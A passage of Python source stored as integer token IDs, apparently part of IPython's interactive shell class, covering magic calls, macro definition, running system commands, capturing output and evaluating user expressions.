220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 479, 86, 22046, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 651, 35226, 7, 22184, 11, 366, 50032, 62, 12001, 62, 29982, 1600, 10352, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 479, 86, 22046, 17816, 12001, 62, 5907, 20520, 796, 2116, 13, 7220, 62, 5907, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26498, 796, 357, 32707, 62, 853, 62, 82, 11, 2685, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 24714, 46491, 22046, 11, 12429, 46265, 22046, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1255, 628, 220, 220, 220, 825, 1064, 62, 1370, 62, 32707, 7, 944, 11, 5536, 62, 3672, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16742, 290, 1441, 257, 1627, 5536, 416, 1438, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 6045, 611, 262, 5536, 2125, 470, 1043, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 19726, 873, 62, 37153, 13, 19726, 873, 17816, 1370, 6, 4083, 1136, 7, 32707, 62, 3672, 8, 628, 220, 220, 220, 825, 1064, 62, 3846, 62, 32707, 7, 944, 11, 5536, 62, 3672, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16742, 290, 1441, 257, 2685, 5536, 416, 1438, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 6045, 611, 262, 5536, 2125, 470, 1043, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 19726, 873, 62, 37153, 13, 19726, 873, 17816, 3846, 6, 4083, 1136, 7, 32707, 62, 3672, 8, 628, 220, 220, 220, 825, 1064, 62, 32707, 7, 944, 11, 5536, 62, 3672, 11, 5536, 62, 11031, 11639, 1370, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16742, 290, 1441, 257, 5536, 286, 262, 1813, 2099, 416, 1438, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 6045, 611, 262, 5536, 2125, 470, 1043, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 19726, 873, 62, 37153, 13, 19726, 873, 58, 32707, 62, 11031, 4083, 1136, 7, 32707, 62, 3672, 8, 628, 220, 220, 220, 825, 5536, 7, 944, 11, 1822, 62, 82, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 46162, 38827, 11617, 13, 5765, 1057, 62, 1370, 62, 32707, 3419, 2427, 13, 628, 220, 220, 220, 220, 220, 220, 220, 4889, 257, 5536, 2163, 416, 1438, 13, 628, 220, 220, 220, 220, 220, 220, 220, 23412, 25, 257, 4731, 7268, 262, 1438, 286, 262, 5536, 2163, 284, 869, 290, 198, 220, 220, 220, 220, 220, 220, 220, 597, 3224, 7159, 284, 307, 3804, 284, 262, 5536, 13, 628, 220, 220, 220, 220, 220, 220, 220, 5536, 10786, 3672, 532, 8738, 22944, 2318, 11537, 318, 7548, 284, 19720, 379, 262, 20966, 7535, 198, 220, 220, 220, 220, 220, 220, 220, 6152, 25, 628, 220, 220, 220, 220, 220, 220, 220, 554, 58, 16, 5974, 4064, 3672, 532, 8738, 22944, 2318, 628, 220, 220, 220, 220, 220, 220, 220, 1675, 869, 257, 5536, 1231, 7159, 11, 2391, 779, 5536, 10786, 3672, 27691, 628, 220, 220, 220, 220, 220, 220, 220, 770, 3769, 257, 1774, 11361, 2163, 284, 869, 6101, 7535, 338, 2153, 873, 287, 597, 198, 220, 220, 220, 220, 220, 220, 220, 4938, 11361, 2438, 345, 460, 2099, 379, 262, 28846, 11, 1390, 23607, 290, 198, 220, 220, 220, 220, 220, 220, 220, 13061, 6299, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 16926, 46, 25, 815, 356, 2071, 257, 7812, 1207, 8344, 341, 6509, 994, 30, 198, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 3672, 11, 4808, 11, 5536, 62, 853, 62, 82, 796, 1822, 62, 82, 13, 3911, 653, 10786, 705, 8, 198, 220, 220, 220, 220, 220, 220, 220, 5536, 62, 3672, 796, 5536, 62, 3672, 13, 75, 36311, 7, 3866, 24455, 13, 1546, 34, 62, 45820, 2149, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 5143, 62, 1370, 62, 32707, 7, 32707, 62, 3672, 11, 5536, 62, 853, 62, 82, 11, 4808, 25558, 62, 18053, 28, 17, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 34749, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 8160, 62, 20285, 305, 7, 944, 11, 1438, 11, 606, 330, 305, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 7469, 500, 257, 649, 15021, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 1438, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1438, 286, 262, 15021, 13, 198, 220, 220, 220, 220, 220, 220, 220, 606, 330, 305, 1058, 965, 393, 42755, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 2223, 284, 466, 2402, 39744, 262, 15021, 13, 220, 1002, 257, 4731, 11, 257, 649, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 42755, 2134, 318, 2727, 416, 6427, 262, 4731, 284, 340, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 628, 220, 220, 220, 220, 220, 220, 220, 422, 6101, 7535, 13, 7295, 1330, 15021, 628, 220, 220, 220, 220, 220, 220, 220, 611, 318, 39098, 7, 18855, 330, 305, 11, 965, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 606, 330, 305, 796, 15021, 13, 14155, 305, 7, 18855, 330, 305, 8, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 318, 39098, 7, 18855, 330, 305, 11, 15021, 13, 14155, 305, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 10786, 32, 15021, 1276, 307, 257, 4731, 393, 257, 42755, 4554, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 58, 3672, 60, 796, 606, 330, 305, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 262, 2491, 286, 1080, 9729, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 1080, 62, 79, 46647, 7, 944, 11, 23991, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 14134, 262, 1813, 23991, 287, 257, 850, 14681, 11, 48426, 14367, 448, 14, 8056, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 23991, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9455, 284, 12260, 357, 5171, 407, 886, 287, 705, 5, 3256, 355, 4469, 7767, 389, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 407, 4855, 13, 220, 10358, 407, 307, 257, 3141, 326, 13423, 5128, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 584, 621, 2829, 2420, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 23991, 13, 81, 36311, 22446, 437, 2032, 342, 10786, 5, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 428, 318, 1635, 16370, 9, 422, 257, 22888, 1332, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 466, 407, 1104, 4469, 278, 7767, 780, 356, 2035, 779, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 613, 87, 806, 393, 19860, 284, 1100, 422, 13, 220, 18987, 460, 1464, 655, 869, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 28686, 13, 10057, 3419, 393, 779, 20966, 13, 10057, 28, 541, 13, 10057, 62, 1831, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 611, 484, 1107, 765, 257, 4469, 1429, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 440, 5188, 81, 1472, 7203, 21756, 7767, 407, 4855, 19570, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 356, 11777, 466, 5626, 1441, 262, 850, 14681, 3722, 2438, 11, 780, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 257, 1729, 12, 14202, 1988, 561, 7616, 1058, 20786, 25, 63, 17597, 13, 13812, 25480, 63, 3848, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 5455, 11, 356, 3650, 262, 8420, 62, 8189, 287, 2836, 62, 5907, 13, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 17816, 62, 37023, 62, 8189, 20520, 796, 1080, 7, 944, 13, 7785, 62, 11201, 392, 7, 28758, 11, 6795, 28, 16, 4008, 628, 220, 220, 220, 825, 1080, 62, 1831, 7, 944, 11, 23991, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 14134, 262, 1813, 23991, 287, 257, 850, 14681, 1262, 28686, 13, 10057, 319, 3964, 393, 198, 220, 220, 220, 220, 220, 220, 220, 850, 14681, 13, 13345, 1262, 262, 1080, 7582, 319, 584, 9554, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 23991, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9455, 284, 12260, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 23991, 796, 2116, 13, 7785, 62, 11201, 392, 7, 28758, 11, 6795, 28, 16, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1805, 28686, 13, 10057, 422, 39151, 13532, 319, 3964, 11, 543, 340, 460, 470, 5412, 25, 198, 220, 220, 220, 220, 220, 220, 220, 611, 25064, 13, 24254, 6624, 705, 5404, 2624, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 422, 6101, 7535, 13, 26791, 13557, 14681, 62, 5404, 2624, 1330, 24390, 4944, 8697, 776, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 24390, 4944, 8697, 776, 3419, 355, 3108, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 3108, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 23991, 796, 705, 1, 14689, 67, 4064, 82, 11405, 1, 4, 82, 6, 4064, 357, 6978, 11, 23991, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9940, 796, 28686, 13, 10057, 7, 28758, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 31973, 9492, 3622, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 59, 77, 6, 1343, 2116, 13, 1136, 62, 1069, 4516, 62, 8807, 22784, 2393, 28, 17597, 13, 301, 1082, 81, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9940, 796, 532, 17, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1114, 1426, 844, 262, 1255, 286, 262, 850, 14681, 13, 13345, 3419, 2174, 318, 281, 8420, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 2438, 11, 543, 416, 9831, 318, 6632, 329, 1943, 11, 3967, 329, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1430, 5287, 13, 220, 29739, 12416, 2029, 13108, 389, 10395, 329, 10425, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 290, 262, 10451, 329, 23202, 257, 6737, 284, 281, 8420, 2438, 318, 3221, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 6737, 62, 17618, 10, 12762, 13, 220, 1675, 517, 3538, 28754, 1022, 8420, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 12416, 290, 10425, 11, 20966, 7535, 3544, 4633, 3146, 13, 220, 1114, 4554, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1201, 1630, 12, 66, 318, 6737, 362, 475, 8420, 2438, 11323, 11, 20966, 7535, 338, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 4808, 37023, 62, 8189, 7885, 481, 1100, 532, 17, 13, 220, 5740, 326, 617, 19679, 588, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 269, 1477, 290, 5916, 836, 470, 1061, 427, 14, 41757, 21396, 329, 8420, 12416, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 28883, 796, 28686, 13, 268, 2268, 13, 1136, 10786, 9693, 23304, 3256, 6045, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5765, 17365, 7582, 2427, 286, 4277, 1220, 8800, 14, 1477, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9940, 796, 850, 14681, 13, 13345, 7, 28758, 11, 7582, 28, 17821, 11, 28883, 28, 18558, 18187, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 31973, 9492, 3622, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 15788, 1630, 12, 34, 26, 257, 890, 12854, 1891, 318, 407, 4465, 994, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 59, 77, 6, 1343, 2116, 13, 1136, 62, 1069, 4516, 62, 8807, 22784, 2393, 28, 17597, 13, 301, 1082, 81, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9940, 796, 11323, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 9940, 1875, 13108, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9940, 796, 532, 7, 721, 532, 13108, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 11777, 466, 5626, 1441, 262, 850, 14681, 3722, 2438, 11, 780, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 257, 1729, 12, 14202, 1988, 561, 7616, 1058, 20786, 25, 63, 17597, 13, 13812, 25480, 63, 3848, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 5455, 11, 356, 3650, 262, 8420, 62, 8189, 287, 2836, 62, 5907, 13, 220, 5740, 262, 33815, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 286, 4808, 37023, 62, 8189, 25, 329, 1630, 12, 66, 11, 4808, 37023, 62, 8189, 6624, 532, 12683, 282, 13, 46224, 2043, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 475, 8620, 4482, 30337, 28264, 37023, 62, 8189, 8, 481, 1577, 3722, 35360, 0, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 7220, 62, 5907, 17816, 62, 37023, 62, 8189, 20520, 796, 9940, 628, 220, 220, 220, 1303, 779, 7347, 276, 1080, 416, 4277, 11, 780, 340, 318, 1365, 39207, 198, 220, 220, 220, 1080, 796, 1080, 62, 79, 46647, 628, 220, 220, 220, 825, 651, 22915, 7, 944, 11, 23991, 11, 6626, 28, 17821, 11, 6795, 28, 15, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3855, 5072, 357, 39363, 1390, 336, 1082, 81, 8, 422, 257, 850, 14681, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 23991, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9455, 284, 12260, 357, 5171, 407, 886, 287, 705, 5, 3256, 355, 4469, 7767, 389, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 407, 4855, 13, 198, 220, 220, 220, 220, 220, 220, 220, 6626, 1058, 20512, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 6626, 262, 5072, 656, 281, 6101, 7535, 311, 8053, 13, 220, 15323, 11, 281, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6101, 7535, 30948, 10100, 318, 4504, 13, 220, 2312, 389, 5563, 2092, 284, 3487, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8341, 290, 13042, 11, 351, 257, 1178, 15607, 12608, 329, 4577, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17512, 286, 1627, 12, 3106, 5072, 13, 220, 921, 460, 779, 705, 8348, 319, 606, 329, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3307, 13, 198, 220, 220, 220, 220, 220, 220, 220, 6795, 1058, 493, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1374, 867, 13431, 2029, 262, 24955, 389, 262, 1957, 9633, 543, 815, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 307, 9902, 287, 262, 3141, 4731, 30, 383, 4277, 357, 15, 8, 18533, 326, 262, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7118, 9633, 389, 287, 262, 8931, 5739, 4585, 428, 2163, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 23991, 13, 81, 36311, 22446, 437, 2032, 342, 10786, 5, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 428, 318, 1635, 16370, 9, 422, 257, 22888, 1332, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 440, 5188, 81, 1472, 7203, 21756, 7767, 407, 4855, 19570, 198, 220, 220, 220, 220, 220, 220, 220, 503, 796, 651, 22915, 7, 944, 13, 7785, 62, 11201, 392, 7, 28758, 11, 6795, 28, 18053, 10, 16, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 611, 6626, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 503, 796, 311, 8053, 7, 448, 13, 35312, 6615, 28955, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 503, 796, 30948, 10100, 7, 448, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 503, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 47217, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 18366, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 21437, 82, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 262, 7694, 346, 353, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 8295, 62, 1809, 6525, 62, 15414, 7, 944, 11, 23991, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 18557, 284, 262, 3159, 262, 30101, 1296, 286, 262, 2836, 338, 3141, 13, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2523, 5874, 7538, 416, 49614, 5128, 3951, 326, 2728, 198, 220, 220, 220, 220, 220, 220, 220, 11353, 4585, 284, 4829, 287, 11, 588, 3712, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1220, 69, 2124, 628, 220, 220, 220, 220, 220, 220, 220, 656, 3712, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 40103, 29, 277, 7, 87, 8, 628, 220, 220, 220, 220, 220, 220, 220, 706, 262, 2836, 338, 5128, 6152, 13, 220, 770, 5419, 262, 2836, 1833, 326, 262, 198, 220, 220, 220, 220, 220, 220, 220, 5128, 1627, 373, 14434, 6338, 416, 6101, 7535, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 2116, 13, 12860, 62, 1809, 9108, 62, 15414, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 770, 318, 23170, 4651, 287, 24523, 9492, 5275, 23248, 284, 779, 14996, 36454, 198, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 23031, 29, 366, 1343, 23991, 8, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 37895, 3815, 14, 42712, 507, 422, 9720, 290, 2836, 62, 5907, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 4808, 7220, 62, 26801, 62, 18224, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 7783, 2829, 6631, 8633, 628, 220, 220, 220, 220, 220, 220, 220, 329, 779, 287, 2836, 62, 42712, 507, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 628, 220, 220, 220, 220, 220, 220, 220, 304, 4906, 11, 5418, 518, 11, 256, 65, 796, 2116, 13557, 1136, 62, 41194, 62, 10951, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 336, 65, 796, 2116, 13, 9492, 5275, 22737, 13, 1136, 62, 1069, 4516, 62, 8807, 7, 2963, 431, 11, 5418, 518, 8, 628, 220, 220, 220, 220, 220, 220, 220, 2859, 62, 10951, 796, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 334, 338, 83, 7240, 6, 1058, 705, 18224, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 334, 470, 16740, 1891, 6, 1058, 336, 65, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 334, 6, 12453, 6, 1058, 304, 4906, 13, 834, 3672, 834, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 334, 6, 18206, 518, 6, 1058, 12972, 18, 5589, 265, 13, 21230, 62, 46903, 1098, 7, 18206, 518, 828, 198, 220, 220, 220, 220, 220, 220, 220, 1782, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 2859, 62, 10951, 628, 220, 220, 220, 825, 4808, 18982, 62, 7220, 62, 26801, 7, 944, 11, 26181, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 18982, 257, 2836, 2134, 284, 3359, 8633, 628, 220, 220, 220, 220, 220, 220, 220, 329, 779, 287, 2836, 62, 42712, 507, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 628, 220, 220, 220, 220, 220, 220, 220, 1366, 11, 45243, 796, 2116, 13, 13812, 62, 687, 1436, 13, 18982, 7, 26801, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1988, 796, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 13376, 6, 1058, 705, 482, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 7890, 6, 1058, 1366, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 38993, 6, 1058, 45243, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 1988, 628, 220, 220, 220, 825, 2836, 62, 42712, 507, 7, 944, 11, 14700, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 36, 2100, 4985, 257, 8633, 286, 14700, 287, 262, 2836, 338, 25745, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 14700, 1058, 8633, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 317, 8633, 351, 4731, 8251, 290, 4731, 3815, 13, 220, 383, 5408, 3815, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 815, 307, 4938, 11361, 14700, 11, 1123, 286, 543, 481, 307, 16726, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 287, 262, 2836, 25745, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 317, 8633, 11, 1994, 276, 588, 262, 5128, 14700, 8633, 11, 351, 262, 5527, 285, 524, 12, 774, 9124, 198, 220, 220, 220, 220, 220, 220, 220, 3359, 62, 7890, 286, 1123, 1988, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 503, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 5907, 796, 2116, 13, 7220, 62, 5907, 198, 220, 220, 220, 220, 220, 220, 220, 3298, 62, 5907, 796, 2116, 13, 7220, 62, 20541, 62, 5907, 628, 220, 220, 220, 220, 220, 220, 220, 329, 1994, 11, 44052, 287, 14700, 13, 23814, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1988, 796, 2116, 13557, 18982, 62, 7220, 62, 26801, 7, 18206, 7, 31937, 11, 3298, 62, 5907, 11, 2836, 62, 5907, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1988, 796, 2116, 13557, 7220, 62, 26801, 62, 18224, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 503, 58, 2539, 60, 796, 1988, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 503, 628, 220, 220, 220, 1303, 10097, 45537, 198, 220, 220, 220, 1303, 11597, 3519, 284, 262, 2491, 286, 2438, 198, 220, 220, 220, 1303, 10097, 45537, 628, 220, 220, 220, 825, 409, 7, 944, 11, 23991, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 23002, 1133, 257, 3487, 21015, 2643, 287, 2836, 25745, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2452, 7, 28758, 11, 2116, 13, 7220, 62, 20541, 62, 5907, 11, 2116, 13, 7220, 62, 5907, 8, 628, 220, 220, 220, 825, 819, 7, 944, 11, 44052, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 36, 2100, 4985, 21015, 5408, 44052, 287, 2836, 25745, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 262, 1255, 286, 12660, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 5418, 7, 31937, 11, 2116, 13, 7220, 62, 20541, 62, 5907, 11, 2116, 13, 7220, 62, 5907, 8, 628, 220, 220, 220, 825, 3338, 62, 18558, 7753, 7, 944, 11, 277, 3672, 11, 1635, 3003, 11, 8420, 62, 46430, 28, 25101, 11, 5298, 62, 1069, 11755, 28, 25101, 11, 7582, 62, 69, 315, 942, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 32, 3338, 2196, 286, 262, 3170, 259, 2452, 7753, 22446, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2196, 481, 1239, 3714, 281, 6631, 11, 475, 2427, 3601, 198, 220, 220, 220, 220, 220, 220, 220, 7613, 4049, 6218, 284, 262, 3159, 13, 220, 770, 691, 2499, 319, 5899, 198, 220, 220, 220, 220, 220, 220, 220, 11361, 3696, 351, 262, 764, 9078, 7552, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 277, 3672, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1438, 286, 262, 2393, 284, 307, 10945, 13, 198, 220, 220, 220, 